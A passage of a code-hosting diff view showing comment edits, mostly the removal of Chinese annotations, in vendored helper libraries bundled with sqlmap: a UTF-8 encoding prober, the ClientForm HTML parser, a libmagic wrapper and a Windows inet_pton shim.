def __init__(self):
# 调用父类的初始化函数
super(UTF8Prober, self).__init__()
# 初始化编码状态机
self.coding_sm = CodingStateMachine(UTF8_SM_MODEL)
# 初始化多字节字符数量
self._num_mb_chars = None
# 调用重置函数
self.reset()
# 重置函数
def reset(self):
# 调用父类的重置函数
super(UTF8Prober, self).reset()
# 重置编码状态机
self.coding_sm.reset()
# 重置多字节字符数量
self._num_mb_chars = 0
# 获取字符集名称的属性
@property
def charset_name(self):
# 返回字符集名称
return "utf-8"
# 获取语言名称的属性
@property
def language(self):
# 返回语言名称
return ""
def feed(self, byte_str):
# 遍历byte_str中的每个字符
for c in byte_str:
# 获取下一个状态
coding_state = self.coding_sm.next_state(c)
# 如果状态为ERROR则将状态设置为NOT_ME并跳出循环
if coding_state == MachineState.ERROR:
self._state = ProbingState.NOT_ME
break
# 如果状态为ITS_ME则将状态设置为FOUND_IT并跳出循环
elif coding_state == MachineState.ITS_ME:
self._state = ProbingState.FOUND_IT
break
# 如果状态为START且当前字符长度大于等于2则将_num_mb_chars加1
elif coding_state == MachineState.START:
if self.coding_sm.get_current_charlen() >= 2:
self._num_mb_chars += 1
# 如果状态为DETECTING且置信度大于SHORTCUT_THRESHOLD则将状态设置为FOUND_IT
if self.state == ProbingState.DETECTING:
if self.get_confidence() > self.SHORTCUT_THRESHOLD:
self._state = ProbingState.FOUND_IT
# 返回状态
return self.state
def get_confidence(self):
# 初始化 unlike 为 0.99
unlike = 0.99
# 如果_num_mb_chars 小于 6则 unlike 乘以 ONE_CHAR_PROB 的 _num_mb_chars 次方
if self._num_mb_chars < 6:
unlike *= self.ONE_CHAR_PROB ** self._num_mb_chars
# 返回 1.0 减去 unlike
return 1.0 - unlike
# 否则返回 unlike
else:
return unlike

53
src/sqlmap-master/thirdparty/clientform/clientform.py vendored
Unescape View File

@ -67,47 +67,30 @@ __all__ = ['AmbiguityError', 'CheckboxControl', 'Control',
'TextareaControl', 'XHTMLCompatibleFormParser']
try:
# 尝试导入logging和inspect模块
import logging
import inspect
except ImportError:
# 如果导入失败定义一个空的debug函数
def debug(msg, *args, **kwds):
pass
else:
# 如果导入成功定义一个_logger对象
_logger = logging.getLogger("ClientForm")
# 定义一个优化hack变量
OPTIMIZATION_HACK = True
# 定义一个debug函数
def debug(msg, *args, **kwds):
# 如果优化hack为True则返回
if OPTIMIZATION_HACK:
return
# 获取调用者的函数名
caller_name = inspect.stack()[1][3]
# 定义一个扩展的消息
extended_msg = '%%s %s' % msg
# 定义一个扩展的参数
extended_args = (caller_name,)+args
# 调用_logger对象的debug方法
debug = _logger.debug(extended_msg, *extended_args, **kwds)
# 定义一个_show_debug_messages函数
def _show_debug_messages():
# 定义一个全局变量OPTIMIZATION_HACK
global OPTIMIZATION_HACK
# 将优化hack设置为False
OPTIMIZATION_HACK = False
# 将_logger对象的日志级别设置为DEBUG
_logger.setLevel(logging.DEBUG)
# 定义一个StreamHandler对象
handler = logging.StreamHandler(sys.stdout)
# 将StreamHandler对象的日志级别设置为DEBUG
handler.setLevel(logging.DEBUG)
# 将StreamHandler对象添加到_logger对象中
_logger.addHandler(handler)
try:
@ -131,17 +114,13 @@ except ImportError:
import sys, re, random
if sys.version_info >= (3, 0):
# 如果Python版本大于等于3.0则将xrange替换为range
xrange = range
# monkeypatch to fix http://www.python.org/sf/803422 :-(
# 修补monkeypatch以修复http://www.python.org/sf/803422 :-(
sgmllib.charref = re.compile("&#(x?[0-9a-fA-F]+)[^0-9a-fA-F]")
# HTMLParser.HTMLParser is recent, so live without it if it's not available
# (also, sgmllib.SGMLParser is much more tolerant of bad HTML)
# HTMLParser.HTMLParser是最近的如果不可用则没有它
# 另外sgmllib.SGMLParser对不良HTML的容忍度更高
try:
import HTMLParser
except ImportError:
@ -152,11 +131,9 @@ else:
try:
import warnings
except ImportError:
# 如果没有导入warnings模块则定义一个空函数
def deprecation(message, stack_offset=0):
pass
else:
# 如果成功导入warnings模块则定义一个警告函数
def deprecation(message, stack_offset=0):
warnings.warn(message, DeprecationWarning, stacklevel=3+stack_offset)
@ -247,39 +224,29 @@ string.
return '&'.join(l)
def unescape(data, entities, encoding=DEFAULT_ENCODING):
# 如果data为None或者data中不包含"&"则直接返回data
if data is None or "&" not in data:
return data
# 如果data是字符串类型则将encoding设置为None
if isinstance(data, six.string_types):
encoding = None
# 定义一个函数,用于替换实体
def replace_entities(match, entities=entities, encoding=encoding):
# 获取匹配到的实体
ent = match.group()
# 如果实体以"#"开头则调用unescape_charref函数进行替换
if ent[1] == "#":
return unescape_charref(ent[2:-1], encoding)
# 从entities中获取实体的替换值
repl = entities.get(ent)
# 如果替换值存在并且encoding不为None则尝试将替换值解码为字符串
if repl is not None:
if hasattr(repl, "decode") and encoding is not None:
try:
repl = repl.decode(encoding)
except UnicodeError:
repl = ent
# 如果替换值不存在,则将替换值设置为实体本身
else:
repl = ent
# 返回替换值
return repl
# 使用正则表达式替换data中的实体
return re.sub(r"&#?[A-Za-z0-9]+?;", replace_entities, data)
def unescape_charref(data, encoding):
@ -679,47 +646,31 @@ class _AbstractFormParser:
self._textarea = None
def start_label(self, attrs):
# 打印attrs
debug("%s", attrs)
# 如果当前标签存在,则结束标签
if self._current_label:
self.end_label()
# 创建一个空字典
d = {}
# 遍历attrs
for key, val in attrs:
# 如果val需要转义则进行转义
d[key] = self.unescape_attr_if_required(val)
# 如果存在for属性则taken为True
taken = bool(d.get("for")) # empty id is invalid
# 添加__text属性值为空字符串
d["__text"] = ""
# 添加__taken属性值为taken
d["__taken"] = taken
# 如果taken为True则将d添加到labels列表中
if taken:
self.labels.append(d)
# 将当前标签设置为d
self._current_label = d
def end_label(self):
# 打印空字符串
debug("")
# 获取当前标签
label = self._current_label
# 如果当前标签不存在,则返回
if label is None:
# something is ugly in the HTML, but we're ignoring it
return
# 将当前标签设置为None
self._current_label = None
# 如果当前标签存在则删除__taken属性
# if it is staying around, it is True in all cases
del label["__taken"]
def _add_label(self, d):
#debug("%s", d)
# 如果当前标签存在且__taken属性为False则将__taken属性设置为True并将当前标签添加到d的__label属性中
if self._current_label is not None:
if not self._current_label["__taken"]:
self._current_label["__taken"] = True
@ -792,16 +743,12 @@ class _AbstractFormParser:
controls.append((type, name, d))
def do_isindex(self, attrs):
# 打印传入的属性
debug("%s", attrs)
d = {}
# 遍历属性,将属性名和属性值存入字典
for key, val in attrs:
d[key] = self.unescape_attr_if_required(val)
# 获取当前表单的控件
controls = self._current_form[2]
# 添加标签
self._add_label(d)
# isindex doesn't have type or name HTML attributes
controls.append(("isindex", None, d))

59
src/sqlmap-master/thirdparty/magic/magic.py vendored
Unescape View File

@ -64,16 +64,14 @@ class Magic:
return magic_file(self.cookie, filename)
def __del__(self):
# 析构函数,确保在对象被垃圾回收时关闭 libmagic cookie
# during shutdown magic_close may have been cleared already
if self.cookie and magic_close:
magic_close(self.cookie)
self.cookie = None
# 全局变量用于保存默认和MIME magic对象
_magic_mime = None
_magic = None
# 获取默认和MIME magic对象的函数
def _get_magic_mime():
global _magic_mime
if not _magic_mime:
@ -92,7 +90,6 @@ def _get_magic_type(mime):
else:
return _get_magic()
# 公共函数,用于识别文件和缓冲区
def from_file(filename, mime=False):
m = _get_magic_type(mime)
return m.from_file(filename)
@ -101,7 +98,6 @@ def from_buffer(buffer, mime=False):
m = _get_magic_type(mime)
return m.from_buffer(buffer)
# 使用 ctypes 导入 libmagic 库
try:
libmagic = None
@ -110,7 +106,7 @@ try:
from ctypes import c_char_p, c_int, c_size_t, c_void_p
# 尝试找到 libmagic 库
# Let's try to find magic or magic1
dll = ctypes.util.find_library('magic') or ctypes.util.find_library('magic1')
# This is necessary because find_library returns None if it doesn't find the library
@ -120,7 +116,6 @@ try:
except WindowsError:
pass
# 如果没有找到,尝试平台特定的路径
if not libmagic or not libmagic._name:
platform_to_lib = {'darwin': ['/opt/local/lib/libmagic.dylib',
'/usr/local/lib/libmagic.dylib',
@ -131,13 +126,11 @@ try:
libmagic = ctypes.CDLL(dll)
except OSError:
pass
# 如果仍然没有找到,抛出 ImportError
if not libmagic or not libmagic._name:
# It is better to raise an ImportError since we are importing magic module
raise ImportError('failed to find libmagic. Check your installation')
# 定义 magic_t 类型和错误检查函数
magic_t = ctypes.c_void_p
def errorcheck(result, func, args):
@ -152,7 +145,6 @@ try:
return None
return filename.encode(sys.getfilesystemencoding())
# 使用 ctypes 定义 libmagic 函数
magic_open = libmagic.magic_open
magic_open.restype = magic_t
magic_open.argtypes = [c_int]
@ -206,31 +198,28 @@ try:
magic_compile.restype = c_int
magic_compile.argtypes = [magic_t, c_char_p]
# 如果 libmagic 无法导入,定义回退函数
except (ImportError, OSError):
from_file = from_buffer = lambda *args, **kwargs: MAGIC_UNKNOWN_FILETYPE
# 定义 libmagic 标志常量
MAGIC_NONE = 0x000000 # 无标志
MAGIC_DEBUG = 0x000001 # 打开调试
MAGIC_SYMLINK = 0x000002 # 跟随符号链接
MAGIC_COMPRESS = 0x000004 # 检查压缩文件内部
MAGIC_DEVICES = 0x000008 # 查看设备内容
MAGIC_MIME = 0x000010 # 返回 MIME 字符串
MAGIC_MIME_ENCODING = 0x000400 # 返回 MIME 编码
MAGIC_CONTINUE = 0x000020 # 返回所有匹配项
MAGIC_CHECK = 0x000040 # 打印警告到标准错误
MAGIC_PRESERVE_ATIME = 0x000080 # 退出时恢复访问时间
MAGIC_RAW = 0x000100 # 不转换不可打印字符
MAGIC_ERROR = 0x000200 # 将 ENOENT 等视为真实错误
MAGIC_NO_CHECK_COMPRESS = 0x001000 # 不检查压缩文件
MAGIC_NO_CHECK_TAR = 0x002000 # 不检查 tar 文件
MAGIC_NO_CHECK_SOFT = 0x004000 # 不检查 magic 条目
MAGIC_NO_CHECK_APPTYPE = 0x008000 # 不检查应用程序类型
MAGIC_NO_CHECK_ELF = 0x010000 # 不检查 elf 详细信息
MAGIC_NO_CHECK_ASCII = 0x020000 # 不检查 ascii 文件
MAGIC_NO_CHECK_TROFF = 0x040000 # 不检查 ascii/troff
MAGIC_NO_CHECK_FORTRAN = 0x080000 # 不检查 ascii/fortran
MAGIC_NO_CHECK_TOKENS = 0x100000 # 不检查 ascii/tokens
MAGIC_NONE = 0x000000 # No flags
MAGIC_DEBUG = 0x000001 # Turn on debugging
MAGIC_SYMLINK = 0x000002 # Follow symlinks
MAGIC_COMPRESS = 0x000004 # Check inside compressed files
MAGIC_DEVICES = 0x000008 # Look at the contents of devices
MAGIC_MIME = 0x000010 # Return a mime string
MAGIC_MIME_ENCODING = 0x000400 # Return the MIME encoding
MAGIC_CONTINUE = 0x000020 # Return all matches
MAGIC_CHECK = 0x000040 # Print warnings to stderr
MAGIC_PRESERVE_ATIME = 0x000080 # Restore access time on exit
MAGIC_RAW = 0x000100 # Don't translate unprintable chars
MAGIC_ERROR = 0x000200 # Handle ENOENT etc as real errors
MAGIC_NO_CHECK_COMPRESS = 0x001000 # Don't check for compressed files
MAGIC_NO_CHECK_TAR = 0x002000 # Don't check for tar files
MAGIC_NO_CHECK_SOFT = 0x004000 # Don't check magic entries
MAGIC_NO_CHECK_APPTYPE = 0x008000 # Don't check application type
MAGIC_NO_CHECK_ELF = 0x010000 # Don't check for elf details
MAGIC_NO_CHECK_ASCII = 0x020000 # Don't check for ascii files
MAGIC_NO_CHECK_TROFF = 0x040000 # Don't check ascii/troff
MAGIC_NO_CHECK_FORTRAN = 0x080000 # Don't check ascii/fortran
MAGIC_NO_CHECK_TOKENS = 0x100000 # Don't check ascii/tokens
MAGIC_UNKNOWN_FILETYPE = b"unknown"

41
src/sqlmap-master/thirdparty/wininetpton/win_inet_pton.py vendored
Unescape View File

@ -8,15 +8,14 @@ import socket
import ctypes
import os
# 定义一个结构体用于存储socket地址信息
class sockaddr(ctypes.Structure):
_fields_ = [("sa_family", ctypes.c_short), # 地址族例如AF_INET或AF_INET6
("__pad1", ctypes.c_ushort), # 填充字段
("ipv4_addr", ctypes.c_byte * 4), # IPv4地址4个字节
("ipv6_addr", ctypes.c_byte * 16),# IPv6地址16个字节
("__pad2", ctypes.c_ulong)] # 填充字段
_fields_ = [("sa_family", ctypes.c_short),
("__pad1", ctypes.c_ushort),
("ipv4_addr", ctypes.c_byte * 4),
("ipv6_addr", ctypes.c_byte * 16),
("__pad2", ctypes.c_ulong)]
# 根据操作系统的不同,导入不同的库
if hasattr(ctypes, 'windll'):
WSAStringToAddressA = ctypes.windll.ws2_32.WSAStringToAddressA
WSAAddressToStringA = ctypes.windll.ws2_32.WSAAddressToStringA
@ -28,13 +27,12 @@ else:
WSAStringToAddressA = not_windows
WSAAddressToStringA = not_windows
# inet_pton函数将IP字符串转换为二进制格式
def inet_pton(address_family, ip_string):
addr = sockaddr() # 创建sockaddr实例
addr.sa_family = address_family # 设置地址族
addr_size = ctypes.c_int(ctypes.sizeof(addr)) # 获取地址结构体大小
addr = sockaddr()
addr.sa_family = address_family
addr_size = ctypes.c_int(ctypes.sizeof(addr))
# 使用WSAStringToAddressA函数将IP字符串转换为地址结构体
if WSAStringToAddressA(
ip_string,
address_family,
@ -44,7 +42,6 @@ def inet_pton(address_family, ip_string):
) != 0:
raise socket.error(ctypes.FormatError())
# 根据地址族返回对应的二进制IP地址
if address_family == socket.AF_INET:
return ctypes.string_at(addr.ipv4_addr, 4)
if address_family == socket.AF_INET6:
@ -52,15 +49,14 @@ def inet_pton(address_family, ip_string):
raise socket.error('unknown address family')
# inet_ntop函数将二进制格式的IP地址转换为字符串
def inet_ntop(address_family, packed_ip):
addr = sockaddr() # 创建sockaddr实例
addr.sa_family = address_family # 设置地址族
addr_size = ctypes.c_int(ctypes.sizeof(addr)) # 获取地址结构体大小
ip_string = ctypes.create_string_buffer(128) # 创建字符串缓冲区
ip_string_size = ctypes.c_int(ctypes.sizeof(ip_string)) # 获取字符串缓冲区大小
addr = sockaddr()
addr.sa_family = address_family
addr_size = ctypes.c_int(ctypes.sizeof(addr))
ip_string = ctypes.create_string_buffer(128)
ip_string_size = ctypes.c_int(ctypes.sizeof(ip_string))
# 根据地址族将二进制IP地址复制到地址结构体中
if address_family == socket.AF_INET:
if len(packed_ip) != ctypes.sizeof(addr.ipv4_addr):
raise socket.error('packed IP wrong length for inet_ntoa')
@ -72,7 +68,6 @@ def inet_ntop(address_family, packed_ip):
else:
raise socket.error('unknown address family')
# 使用WSAAddressToStringA函数将地址结构体转换为IP字符串
if WSAAddressToStringA(
ctypes.byref(addr),
addr_size,
@ -84,7 +79,7 @@ def inet_ntop(address_family, packed_ip):
return ip_string[:ip_string_size.value - 1]
# 如果当前操作系统是Windows将自定义的inet_pton和inet_ntop函数添加到socket库中
# Adding our two functions to the socket library
if os.name == 'nt':
socket.inet_pton = inet_pton
socket.inet_ntop = inet_ntop
socket.inet_ntop = inet_ntop

Write Preview
Loading…
Cancel
Save